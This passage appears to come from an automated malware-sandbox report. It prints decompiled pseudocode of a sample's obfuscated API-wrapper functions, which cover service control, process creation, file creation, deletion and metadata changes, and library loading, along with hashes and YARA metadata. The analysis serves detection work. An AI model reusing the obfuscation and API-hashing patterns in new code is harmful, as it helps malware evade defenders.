                                                      			E001D5FB2(void* __ecx, void* __edx, void* _a4) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t21;
                                                      				int _t27;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E001D602B(_t21);
                                                      				_v12 = 0x33d;
                                                      				_v12 = _v12 + 0xc3dc;
                                                      				_v12 = _v12 | 0x39ccfb02;
                                                      				_v12 = _v12 ^ 0x39ccf342;
                                                      				_v8 = 0xe8d9;
                                                      				_v8 = _v8 * 0x16;
                                                      				_v8 = _v8 | 0x4145347f;
                                                      				_v8 = _v8 ^ 0x9035ef96;
                                                      				_v8 = _v8 ^ 0xd1609914;
                                                      				E001E07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
                                                      				_t27 = CloseServiceHandle(_a4); // executed
                                                      				return _t27;
                                                      			}








                                                      APIs
                                                      • CloseServiceHandle.ADVAPI32(39CCF342), ref: 001D6025
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.2109384640.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                                      • Associated: 00000009.00000002.2109371682.00000000001D0000.00000004.00000001.sdmp
                                                      • Associated: 00000009.00000002.2109411164.00000000001EC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandleService
                                                      • String ID:
                                                      • API String ID: 1725840886-0
                                                      • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                                      • Instruction ID: 21e3675d678c7d47ccde82411a3224adeb747ad6c423f1aa475c33c6d4e2ced6
                                                      • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                                      • Instruction Fuzzy Hash: 7DF04FB0C11208FFDB08DFA0E94689EBFB8EB54300F208198E409A7260E7B15F559F54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Executed Functions

                                                      C-Code - Quality: 62%
                                                      			E00272959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				void* _t30;
                                                      				void* _t39;
                                                      				signed int _t41;
                                                      				signed int _t42;
                                                      
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(0);
                                                      				_push(0);
                                                      				E0027602B(_t30);
                                                      				_v12 = 0x5e3c;
                                                      				_t41 = 0x63;
                                                      				_v12 = _v12 / _t41;
                                                      				_t42 = 0x2f;
                                                      				_v12 = _v12 / _t42;
                                                      				_v12 = _v12 ^ 0x000064be;
                                                      				_v8 = 0x74da;
                                                      				_v8 = _v8 | 0xfefeeaea;
                                                      				_v8 = _v8 >> 0xc;
                                                      				_v8 = _v8 ^ 0x000fb531;
                                                      				E002807A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
                                                      				_t39 = OpenSCManagerW(0, 0, _a16); // executed
                                                      				return _t39;
                                                      			}










                                                      APIs
                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002729DC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2111315259.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true
                                                      • Associated: 0000000A.00000002.2111298675.0000000000270000.00000004.00000001.sdmp
                                                      • Associated: 0000000A.00000002.2111387036.000000000028C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ManagerOpen
                                                      • String ID: <^
                                                      • API String ID: 1889721586-3203995635
                                                      • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                                      • Instruction ID: 23d533029c3056aabe95aed0a0a9b438db4a3eeeeaaebe737ea5bdb30237e692
                                                      • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                                      • Instruction Fuzzy Hash: A8016D72A01108BFEB14DF95DC4A8DFBFB6EF48310F108088F508A6250D7B65F619B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E0027C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                      				signed int _v8;
                                                      				unsigned int _v12;
                                                      				intOrPtr _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _v24;
                                                      				intOrPtr _v28;
                                                      				void* _t29;
                                                      				intOrPtr* _t33;
                                                      				void* _t34;
                                                      
                                                      				E0027602B(_t29);
                                                      				_v28 = 0x4fe02f;
                                                      				_v24 = 0x232390;
                                                      				_v20 = 0xf8460;
                                                      				_v16 = 0;
                                                      				_v12 = 0xf625;
                                                      				_v12 = _v12 >> 6;
                                                      				_v12 = _v12 >> 0xa;
                                                      				_v12 = _v12 + 0xffffcc6f;
                                                      				_v12 = _v12 ^ 0xffffa5b6;
                                                      				_v8 = 0xe5cd;
                                                      				_v8 = _v8 + 0xffffae4d;
                                                      				_v8 = _v8 | 0xf8bbefe7;
                                                      				_v8 = _v8 ^ 0xf8bbcc9a;
                                                      				_t33 = E002807A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
                                                      				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
                                                      				return _t34;
                                                      			}













                                                      APIs
                                                      • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0027C762
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2111315259.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true
                                                      • Associated: 0000000A.00000002.2111298675.0000000000270000.00000004.00000001.sdmp
                                                      • Associated: 0000000A.00000002.2111387036.000000000028C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FolderPath
                                                      • String ID: /O
                                                      • API String ID: 1514166925-1923427199
                                                      • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                                      • Instruction ID: 4934cc63de34540049d58cd22dfaecafe2c44dd235de8f7cee2a288c4fcd6884
                                                      • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                                      • Instruction Fuzzy Hash: 8F1133B290222DBBCB25DF95DC498EFBFB8EF04714F108188F90962210D3714B659BE0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 82%
                                                      			E00271000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _v24;
                                                      				void* _t33;
                                                      				struct HINSTANCE__* _t40;
                                                      				signed int _t42;
                                                      
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				E0027602B(_t33);
                                                      				_v16 = _v16 & 0x00000000;
                                                      				_v24 = 0x1b2eda;
                                                      				_v20 = 0x33a3b7;
                                                      				_v12 = 0x98c;
                                                      				_v12 = _v12 + 0xb426;
                                                      				_v12 = _v12 + 0x5beb;
                                                      				_t42 = 0x63;
                                                      				_v12 = _v12 / _t42;
                                                      				_v12 = _v12 ^ 0x00000fce;
                                                      				_v8 = 0x120e;
                                                      				_v8 = _v8 + 0xfffffcb8;
                                                      				_v8 = _v8 + 0xffffefaa;
                                                      				_v8 = _v8 >> 5;
                                                      				_v8 = _v8 ^ 0x07ff9a02;
                                                      				E002807A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
                                                      				_t40 = LoadLibraryW(_a12); // executed
                                                      				return _t40;
                                                      			}












                                                      APIs
                                                      • LoadLibraryW.KERNEL32(0033A3B7), ref: 00271096
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2111315259.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true
                                                      • Associated: 0000000A.00000002.2111298675.0000000000270000.00000004.00000001.sdmp
                                                      • Associated: 0000000A.00000002.2111387036.000000000028C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID: [
                                                      • API String ID: 1029625771-3431493590
                                                      • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                                      • Instruction ID: cb5d1f7e7c77c56ae6f7c60883998667d5e1ccb51de3edb52ae8abe7d7fdd84a
                                                      • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                                      • Instruction Fuzzy Hash: F7015BB6D01708BBDF04DF94C94A5DEBBB1AB54318F108188E41466291D3B19B689B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00274859() {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t22;
                                                      
                                                      				_v12 = 0xafe2;
                                                      				_v12 = _v12 * 0x42;
                                                      				_v12 = _v12 + 0xffffdd89;
                                                      				_v12 = _v12 ^ 0x002d198d;
                                                      				_v8 = 0x5b09;
                                                      				_v8 = _v8 | 0xa1ea9544;
                                                      				_v8 = _v8 * 0x12;
                                                      				_v8 = _v8 ^ 0x6283d9c1;
                                                      				E002807A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
                                                      				ExitProcess(0);
                                                      			}







                                                      APIs
                                                      • ExitProcess.KERNELBASE(00000000), ref: 002748B7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2111315259.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true
                                                      • Associated: 0000000A.00000002.2111298675.0000000000270000.00000004.00000001.sdmp
                                                      • Associated: 0000000A.00000002.2111387036.000000000028C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID: [
                                                      • API String ID: 621844428-1822564810
                                                      • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                                      • Instruction ID: 29cc95b77f91dd26d4372fbf7ca8f9429afc5be4d3e0f6f1ef3b1c709b7f5037
                                                      • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                                      • Instruction Fuzzy Hash: 83F017B0A15209FBDB44CFE8CA9699EBFB9EB40301F20818CE444B7290E3B15F549B50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 66%
                                                      			E00284F7D(void* __ecx, void* __edx, void* _a4) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t17;
                                                      				int _t24;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E0027602B(_t17);
                                                      				_v12 = 0xddd8;
                                                      				_v12 = _v12 * 0x48;
                                                      				_v12 = _v12 ^ 0x003e66d8;
                                                      				_v8 = 0xcb35;
                                                      				_v8 = _v8 ^ 0x7b88573c;
                                                      				_v8 = _v8 * 0x59;
                                                      				_v8 = _v8 ^ 0xf27e4a21;
                                                      				E002807A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
                                                      				_t24 = CloseHandle(_a4); // executed
                                                      				return _t24;
                                                      			}








                                                      APIs
                                                      • CloseHandle.KERNELBASE(003E66D8), ref: 00284FE2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2111315259.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true
                                                      • Associated: 0000000A.00000002.2111298675.0000000000270000.00000004.00000001.sdmp
                                                      • Associated: 0000000A.00000002.2111387036.000000000028C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID: {#lm
                                                      • API String ID: 2962429428-1564096886
                                                      • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                                      • Instruction ID: 81d8b0cbe170351add54bc97a8067ea70379330acb0679ff67c19b6f1c515823
                                                      • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                                      • Instruction Fuzzy Hash: F2F037B081220CFFDB04EFA4D98689EBFBAEB44300F208199E808AB250D3715B649B50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 21%
                                                      			E0028976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				void* _t34;
                                                      				int _t39;
                                                      				struct _PROCESS_INFORMATION* _t48;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_t48 = __edx;
                                                      				_push(0);
                                                      				_push(_a68);
                                                      				_push(0);
                                                      				_push(_a60);
                                                      				_push(_a56);
                                                      				_push(_a52);
                                                      				_push(0);
                                                      				_push(_a44);
                                                      				_push(_a40);
                                                      				_push(0);
                                                      				_push(0);
                                                      				_push(_a28);
                                                      				_push(_a24);
                                                      				_push(_a20);
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				_push(__ecx);
                                                      				E0027602B(_t34);
                                                      				_v12 = 0xaff9;
                                                      				_v12 = _v12 | 0xcee54bd1;
                                                      				_v12 = _v12 + 0x6ed6;
                                                      				_v12 = _v12 ^ 0xcee61221;
                                                      				_v8 = 0x6229;
                                                      				_v8 = _v8 ^ 0x42aa9f31;
                                                      				_v8 = _v8 >> 2;
                                                      				_v8 = _v8 ^ 0x10aad83f;
                                                      				E002807A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
                                                      				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
                                                      				return _t39;
                                                      			}









                                                      APIs
                                                      • CreateProcessW.KERNEL32(0027591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0027591A), ref: 00289816
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2111315259.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true
                                                      • Associated: 0000000A.00000002.2111298675.0000000000270000.00000004.00000001.sdmp
                                                      • Associated: 0000000A.00000002.2111387036.000000000028C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                                      • Instruction ID: 71d372d6eeb36552ba429c1e51a1e5a4d21d2ea10996de98c2c02c4b4e0f3351
                                                      • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                                      • Instruction Fuzzy Hash: B511B372911148BFDF599F96DC0ACDF7F7AEF89750F108148FA1556120D2728A60EBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 31%
                                                      			E0027B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				void* _t32;
                                                      				void* _t38;
                                                      				long _t47;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a48);
                                                      				_t47 = __edx;
                                                      				_push(_a44);
                                                      				_push(_a40);
                                                      				_push(_a36);
                                                      				_push(_a32);
                                                      				_push(_a28);
                                                      				_push(_a24);
                                                      				_push(0);
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				_push(0);
                                                      				E0027602B(_t32);
                                                      				_v8 = 0xfd14;
                                                      				_v8 = _v8 >> 4;
                                                      				_v8 = _v8 * 0x7a;
                                                      				_v8 = _v8 >> 9;
                                                      				_v8 = _v8 ^ 0x00002bef;
                                                      				_v12 = 0x4f26;
                                                      				_v12 = _v12 | 0xe7e97f76;
                                                      				_v12 = _v12 ^ 0xe7e94dbb;
                                                      				E002807A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
                                                      				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
                                                      				return _t38;
                                                      			}









                                                      APIs
                                                      • CreateFileW.KERNELBASE(00280668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00280668,?,?,?,?), ref: 0027B5FD
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2111315259.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true
                                                      • Associated: 0000000A.00000002.2111298675.0000000000270000.00000004.00000001.sdmp
                                                      • Associated: 0000000A.00000002.2111387036.000000000028C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                                      • Instruction ID: 6a5fb35de188177de2f78cb3aff3be9eb9857be4b73b987a09397710c5cca1f6
                                                      • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                                      • Instruction Fuzzy Hash: 5211B272801248BBDF56DF95DD06CEE7F7AFF89314F148198FA1862160D3729A20EB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 54%
                                                      			E0028981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t22;
                                                      				void* _t28;
                                                      				void* _t34;
                                                      				long _t37;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a16);
                                                      				_t34 = __edx;
                                                      				_t37 = __ecx;
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				_push(__ecx);
                                                      				E0027602B(_t22);
                                                      				_v12 = 0xe68;
                                                      				_v12 = _v12 * 0x39;
                                                      				_v12 = _v12 ^ 0xd1b1d871;
                                                      				_v12 = _v12 ^ 0xd1b2fb7e;
                                                      				_v8 = 0x629e;
                                                      				_v8 = _v8 + 0xfffff5da;
                                                      				_v8 = _v8 | 0xbef7b77b;
                                                      				_v8 = _v8 ^ 0xbef79fc3;
                                                      				E002807A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
                                                      				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
                                                      				return _t28;
                                                      			}










                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002787F2,0000CAAE,0000510C,AD82F196), ref: 0028989B
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2111315259.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true
                                                      • Associated: 0000000A.00000002.2111298675.0000000000270000.00000004.00000001.sdmp
                                                      • Associated: 0000000A.00000002.2111387036.000000000028C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                                      • Instruction ID: 48b4110e36b1443f9121bbed435ee8175c118321d8aafb5fc0ad7413a4ade397
                                                      • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                                      • Instruction Fuzzy Hash: 7D019A76801208FBDB04EFD5DC46CDFBF79EF85310F108188F908A6220E6715B219BA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 62%
                                                      			E00287BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t24;
                                                      				int _t31;
                                                      				signed int _t33;
                                                      				struct _SHFILEOPSTRUCTW* _t40;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a12);
                                                      				_t40 = __ecx;
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E0027602B(_t24);
                                                      				_v8 = 0xa117;
                                                      				_t33 = 0x76;
                                                      				_v8 = _v8 / _t33;
                                                      				_v8 = _v8 >> 4;
                                                      				_v8 = _v8 ^ 0x210fe703;
                                                      				_v8 = _v8 ^ 0x210fdcea;
                                                      				_v12 = 0xf1e9;
                                                      				_v12 = _v12 << 9;
                                                      				_v12 = _v12 ^ 0x01e3a445;
                                                      				E002807A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
                                                      				_t31 = SHFileOperationW(_t40); // executed
                                                      				return _t31;
                                                      			}










                                                      APIs
                                                      • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00287C67
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2111315259.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true
                                                      • Associated: 0000000A.00000002.2111298675.0000000000270000.00000004.00000001.sdmp
                                                      • Associated: 0000000A.00000002.2111387036.000000000028C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileOperation
                                                      • String ID:
                                                      • API String ID: 3080627654-0
                                                      • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                                      • Instruction ID: c88058e3f956a201e62ac8fefa26631285943e80a9dd8f5ce2b7d9d9758d511d
                                                      • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                                      • Instruction Fuzzy Hash: 56014FB190120CFFEB09DF94C84A8DEBBB5EF44314F108198F40567240E6B15F609B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 52%
                                                      			E0027F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				void* _t24;
                                                      				void* _t29;
                                                      				int _t35;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a20);
                                                      				_t35 = __ecx;
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E0027602B(_t24);
                                                      				_v12 = 0xd5a7;
                                                      				_v12 = _v12 ^ 0x994cba9d;
                                                      				_v12 = _v12 ^ 0x994c19d3;
                                                      				_v8 = 0xac88;
                                                      				_v8 = _v8 << 3;
                                                      				_v8 = _v8 >> 8;
                                                      				_v8 = _v8 + 0xebed;
                                                      				_v8 = _v8 ^ 0x0000ab82;
                                                      				E002807A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
                                                      				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
                                                      				return _t29;
                                                      			}









                                                      APIs
                                                      • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0027F6D8
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2111315259.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true
                                                      • Associated: 0000000A.00000002.2111298675.0000000000270000.00000004.00000001.sdmp
                                                      • Associated: 0000000A.00000002.2111387036.000000000028C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: OpenService
                                                      • String ID:
                                                      • API String ID: 3098006287-0
                                                      • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                                      • Instruction ID: 4a315a5291038ea88c2fb2798cf444c4ab9c44c8d5ed0b15817a42d35b9cb1eb
                                                      • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                                      • Instruction Fuzzy Hash: CB01E5B6901208BFEF05AF94DC4A8DF7F75EB05324F148188F90462250D6B25E21DBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E0027B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                      				signed int _v8;
                                                      				unsigned int _v12;
                                                      				void* _t23;
                                                      				intOrPtr* _t27;
                                                      				void* _t28;
                                                      
                                                      				E0027602B(_t23);
                                                      				_v12 = 0x9431;
                                                      				_v12 = _v12 >> 7;
                                                      				_v12 = _v12 ^ 0x0000160f;
                                                      				_v8 = 0xc972;
                                                      				_v8 = _v8 ^ 0x829e0126;
                                                      				_v8 = _v8 + 0x4512;
                                                      				_v8 = _v8 + 0xffff18f9;
                                                      				_v8 = _v8 ^ 0x829e24c1;
                                                      				_t27 = E002807A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
                                                      				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
                                                      				return _t28;
                                                      			}









                                                      APIs
                                                      • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0027B759
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2111315259.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true
                                                      • Associated: 0000000A.00000002.2111298675.0000000000270000.00000004.00000001.sdmp
                                                      • Associated: 0000000A.00000002.2111387036.000000000028C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileHandleInformation
                                                      • String ID:
                                                      • API String ID: 3935143524-0
                                                      • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                                      • Instruction ID: 39425e63c0c223bbfd320331d13a9d3338563cc64aed30bfe319847f9b174ec7
                                                      • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                                      • Instruction Fuzzy Hash: 120178B6941308FBEB45DF90DD06A9E7BB5EB08704F108188FA09261A0D3B25A20AB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E0028AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                                      				signed int _v8;
                                                      				unsigned int _v12;
                                                      				void* _t21;
                                                      				int _t27;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E0027602B(_t21);
                                                      				_v12 = 0xcc49;
                                                      				_v12 = _v12 << 6;
                                                      				_v12 = _v12 >> 2;
                                                      				_v12 = _v12 ^ 0x000ca988;
                                                      				_v8 = 0x5d85;
                                                      				_v8 = _v8 | 0xb9d19a55;
                                                      				_v8 = _v8 * 0xd;
                                                      				_v8 = _v8 ^ 0x6fa87272;
                                                      				E002807A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
                                                      				_t27 = DeleteFileW(_a12); // executed
                                                      				return _t27;
                                                      			}








                                                      APIs
                                                      • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0028AAA8
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2111315259.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true
                                                      • Associated: 0000000A.00000002.2111298675.0000000000270000.00000004.00000001.sdmp
                                                      • Associated: 0000000A.00000002.2111387036.000000000028C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteFile
                                                      • String ID:
                                                      • API String ID: 4033686569-0
                                                      • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                                      • Instruction ID: de235b87c96ac636f0eef76f87fa29bbb056d4babdaad4044c6ed165612fae49
                                                      • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                                      • Instruction Fuzzy Hash: 8CF069B591020CFFDF08EF94DD4A89EBFB4EB44304F108088F805A6250D3B29B649B50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 70%
                                                      			E00275FB2(void* __ecx, void* __edx, void* _a4) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t21;
                                                      				int _t27;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E0027602B(_t21);
                                                      				_v12 = 0x33d;
                                                      				_v12 = _v12 + 0xc3dc;
                                                      				_v12 = _v12 | 0x39ccfb02;
